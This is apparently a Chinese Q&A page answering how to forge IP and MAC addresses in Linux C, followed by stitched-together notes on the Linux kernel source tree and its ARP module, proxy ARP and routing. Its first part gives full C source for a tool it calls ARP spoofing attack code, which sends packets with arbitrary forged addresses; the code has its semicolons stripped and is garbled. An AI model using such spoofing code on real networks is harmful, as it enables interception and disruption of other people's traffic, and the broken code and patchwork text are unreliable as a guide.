Linux C编程, 如何仿造ip、mac地址发送报文呢? 是利用ARP协议漏洞吗?有没有源代码借鉴下~~

Linux C编程, 如何仿造ip、mac地址发送报文呢? 是利用ARP协议漏洞吗?有没有源代码借鉴下~~,第1张

一个arp欺骗攻击的代码如下:

/*

This program sends out ARP packet(s) with source/target IP

and Ethernet hardware addresses supplied by the user.

*/

#include <stdlib.h>

#include <netdb.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <stdio.h>

#include <errno.h>

#include <sys/ioctl.h>

#include <net/if.h>

#include <signal.h>

#include <netinet/ip.h>

#include <netinet/in.h>

#include <string.h>

#include <arpa/inet.h>

#include <netinet/ip_icmp.h>

#include <linux/if_ether.h>

#define ETH_HW_ADDR_LEN 6

#define IP_ADDR_LEN 4

#define ARP_FRAME_TYPE 0x0806

#define ETHER_HW_TYPE 1

#define IP_PROTO_TYPE 0x0800

#define OP_ARP_REQUEST 2

#define OP_ARP_QUEST 1

#define DEFAULT_DEVICE "eth0"

char usage[] = {"send_arp: sends out custom ARP packet. \n"

"usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"}

struct arp_packet

{

u_char targ_hw_addr[ETH_HW_ADDR_LEN]

u_char src_hw_addr[ETH_HW_ADDR_LEN]

u_short frame_type

u_short hw_type

u_short prot_type

u_char hw_addr_size

u_char prot_addr_size

u_short op

u_char sndr_hw_addr[ETH_HW_ADDR_LEN]

u_char sndr_ip_addr[IP_ADDR_LEN]

u_char rcpt_hw_addr[ETH_HW_ADDR_LEN]

u_char rcpt_ip_addr[IP_ADDR_LEN]

u_char padding[18]

}

void die (char *)

void get_ip_addr (struct in_addr *, char *)

void get_hw_addr (char *, char *)

int main (int argc, char * argv[])

{

struct in_addr src_in_addr, targ_in_addr

struct arp_packet pkt

struct sockaddr sa

int sock

int j,number

if (argc != 6)

die(usage)

sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP))

if (sock <0)

{

perror("socket")

exit(1)

}

number = atoi(argv[5])

pkt.frame_type = htons(ARP_FRAME_TYPE)

pkt.hw_type = htons(ETHER_HW_TYPE)

pkt.prot_type = htons(IP_PROTO_TYPE)

pkt.hw_addr_size = ETH_HW_ADDR_LEN

pkt.prot_addr_size = IP_ADDR_LEN

pkt.op = htons(OP_ARP_QUEST)

get_hw_addr(pkt.targ_hw_addr, argv[4])

get_hw_addr(pkt.rcpt_hw_addr, argv[4])

get_hw_addr(pkt.src_hw_addr, argv[2])

get_hw_addr(pkt.sndr_hw_addr, argv[2])

get_ip_addr(&src_in_addr, argv[1])

get_ip_addr(&targ_in_addr, argv[3])

memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN)

memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN)

bzero(pkt.padding,18)

strcpy(sa.sa_data, DEFAULT_DEVICE)

for (j = 0j <numberj++)

{

if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) <0)

{

perror("sendto")

exit(1)

}

}

exit(0)

}

void die (char *str)

{

fprintf(stderr,"%s\n",str)

exit(1)

}

void get_ip_addr(struct in_addr *in_addr, char *str)

{

struct hostent *hostp

in_addr->s_addr = inet_addr(str)

if(in_addr->s_addr == -1)

{

if ((hostp = gethostbyname(str)))

bcopy(hostp->h_addr, in_addr, hostp->h_length)

else {

fprintf(stderr, "send_arp: unknown host %s\n", str)

exit(1)

}

}

}

void get_hw_addr (char *buf, char *str)

{

int i

char c, val

for(i = 0i <ETH_HW_ADDR_LENi++)

{

if (!(c = tolower(*str++)))

die("Invalid hardware address")

if (isdigit(c))

val = c - '0'

else if (c >= 'a' &&c <= 'f')

val = c-'a'+10

else

die("Invalid hardware address")

*buf = val <<4

if (!(c = tolower(*str++)))

die("Invalid hardware address")

if (isdigit(c))

val = c - '0'

else if (c >= 'a' &&c <= 'f')

val = c-'a'+10

else

die("Invalid hardware address")

*buf++ |= val

if (*str == ':')

str++

}

}

一般在Linux系统中的/usr/src/linux*.*.*(*.*.*代表的是内核版本,如2.4.23)目录下就是内核源代码(如果没有类似目录,是因为还没安装内核代码)。另外还可从互连网上免费下载。注意,不要总到http://www.kernel.org/去下载,最好使用它的镜像站点下载。请在http://www.kernel.org/mirrors/里找一个合适的下载点,再到pub/linux/kernel/v2.6/目录下去下载2.4.23内核。 代码目录结构 在阅读源码之前,还应知道Linux内核源码的整体分布情况。现代的 *** 作系统一般由进程管理、内存管理、文件系统、驱动程序和网络等组成。Linux内核源码的各个目录大致与此相对应,其组成如下(假设相对于Linux-2.4.23目录): 1.arch目录包括了所有和体系结构相关的核心代码。它下面的每一个子目录都代表一种Linux支持的体系结构,例如i386就是Intel CPU及与之相兼容体系结构的子目录。PC机一般都基于此目录。 2.include目录包括编译核心所需要的大部分头文件,例如与平台无关的头文件在include/linux子目录下。 3.init目录包含核心的初始化代码(不是系统的引导代码),有main.c和Version.c两个文件。这是研究核心如何工作的好起点。 4.mm目录包含了所有的内存管理代码。与具体硬件体系结构相关的内存管理代码位于arch/*/mm目录下。 5.drivers目录中是系统中所有的设备驱动程序。它又进一步划分成几类设备驱动,每一种有对应的子目录,如声卡的驱动对应于drivers/sound。 6.ipc目录包含了核心进程间的通信代码。 7.modules目录存放了已建好的、可动态加载的模块。 8.fs目录存放Linux支持的文件系统代码。不同的文件系统有不同的子目录对应,如ext3文件系统对应的就是ext3子目录。 Kernel内核管理的核心代码放在这里。同时与处理器结构相关代码都放在arch/*/kernel目录下。 9.net目录里是核心的网络部分代码,其每个子目录对应于网络的一个方面。 10.lib目录包含了核心的库代码,不过与处理器结构相关的库代码被放在arch/*/lib/目录下。 11.scripts目录包含用于配置核心的脚本文件。 12.documentation目录下是一些文档,是对每个目录作用的具体说明。 一般在每个目录下都有一个.depend文件和一个Makefile文件。这两个文件都是编译时使用的辅助文件。仔细阅读这两个文件对弄清各个文件之间的联系和依托关系很有帮助。另外有的目录下还有Readme文件,它是对该目录下文件的一些说明,同样有利于对内核源码的理解。 在阅读方法或顺序上,有纵向与横向之分。所谓纵向就是顺着程序的执行顺序逐步进行;所谓横向,就是按模块进行。它们经常结合在一起进行。对于Linux启动的代码可顺着Linux的启动顺序一步步来阅读;对于像内存管理部分,可以单独拿出来进行阅读分析。实际上这是一个反复的过程,不可能读一遍就理解。

从ip_finish_output2到dev_queue_xmit路径:

http://www.bluestep.cc/linux%e5%91%bd%e4%bb%a4arping-%e7%bd%91%e7%bb%9c%e7%ae%a1%e7%90%86-%e9%80%9a%e8%bf%87%e5%8f%91%e9%80%81arp%e5%8d%8f%e8%ae%ae%e6%8a%a5%e6%96%87%e6%b5%8b%e8%af%95%e7%bd%91%e7%bb%9c/

arp协议:

(1).硬件类型:

硬件地址类型,该字段值一般为ARPHRD_ETHER,表示以太网。

(2).协议类型:

表示三层地址使用的协议,该字段值一般为ETH_P_IP,表示IP协议

(3)硬件地址长度,以太网MAC地址就是6;

(4)协议地址长度,IP地址就是4;

(5) *** 作码

常见的有四种,arp请求,arp相应,rarp请求,rarp相应。

(6)发送方硬件地址与IP地址,(7)目标硬件地址与目标IP地址。

arp头数据结构:

arp模块的初始化函数为arp_init(),这个函数在ipv4协议栈的初始化函数inet_init()中被调用。

1.初始化arp表arp_tbl

2.注册arp协议类型;

3.建立arp相关proc文件,/proc/net/arp;

4.注册通知事件

一个neigh_table对应一种邻居协议,IPv4就是arp协议。用来存储于邻居协议相关的参数、功能函数、邻居项散列表等。

一个neighbour对应一个邻居项,就是一个arp条目

邻居项函数指针表,实现三层和二层的dev_queue_xmit()之间的跳转。

用来存储统计信息,一个结构实例对应一个网络设备上的一种邻居协议。

注册arp报文类型 :dev_add_pack(&arp_packet_type)

就是把arp_packet_type添加到ptype_base哈希表中。

注册新通知事件的时候,在已经注册和UP的设备上,会调用一次这个通知事件。

设备事件类型:

创建一个邻居项,并将其添加到散列表上,返回指向该邻居项的指针。

tbl:待创建的邻居项所属的邻居表,即arp_tbl;

pkey:三层协议地址(IP地址)

dev:输出设备

want_ref:??

创建邻居项

1.设置邻居项的类型

2.设置邻居项的ops指针

3.设置邻居项的output函数指针

调用dst_link_failure()函数向三层报告错误,当邻居项缓存中还有未发送的报文,而该邻居却无法访问时被调用。不懂。

用来发送arp请求,在邻居项状态定时器处理函数中被调用。

neigh:arp请求的目的邻居项

skb:缓存在该邻居项中的待发送报文,用来获取该skb的源ip地址。

将得到的硬件源、目的地址,IP源、目的地址等作为参数,调用arp_send()函数创建一个arp报文并将其输出。

创建及发送arp报文

创建arp报文,填充字段。

发送arp报文

用来从二层接收并处理一个arp报文。这个函数中就是做了一些参数检查,然后调用arp_process()函数。

neigh_event_ns

neigh_update

这个函数的作用就是更新邻居项硬件地址和状态。分支比较多。

neigh_update_notify

代理arp(proxy arp),通常像路由器这样的设备才使用,用来代替处于另一个网段的主机回答本网段主机的arp请求。

感觉代码ARP好像没啥用呀。

网络主机发包的一般过程:

1.当目的IP和自己在同一网段时,直接arp请求该目的IP的MAC。

2.当目的IP和自己不再同一网段时,arp请求默认网关的MAC。

https://www.cnblogs.com/taitai139/p/12336554.html

https://www.cnblogs.com/Widesky/p/10489514.html

当主机没有默认网关的时候,arp请求别的网段的报文,到达路由器后,本来路由器是要隔离广播的,把这个arp请求报文给丢弃,这样就没法通信了。当路由器开启arp proxy后,路由器发现请求的目的IP在其他网段,就自己给主机回复一个arp响应报文,这样源主机就把路由器的MAC当成目的IP主机对应的MAC,可以通信了。这样可能会造成主机arp表中,多个IP地址都对应于路由器的同一个MAC地址。

可以使用arping命令发送指定IP的arp请求报文。

写完了发现这个老妹写的arp代理文章蛮好的,不过她好像是转载的。


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/yw/6233664.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-03-18
下一篇 2023-03-18

发表评论

登录后才能评论

评论列表(0条)

保存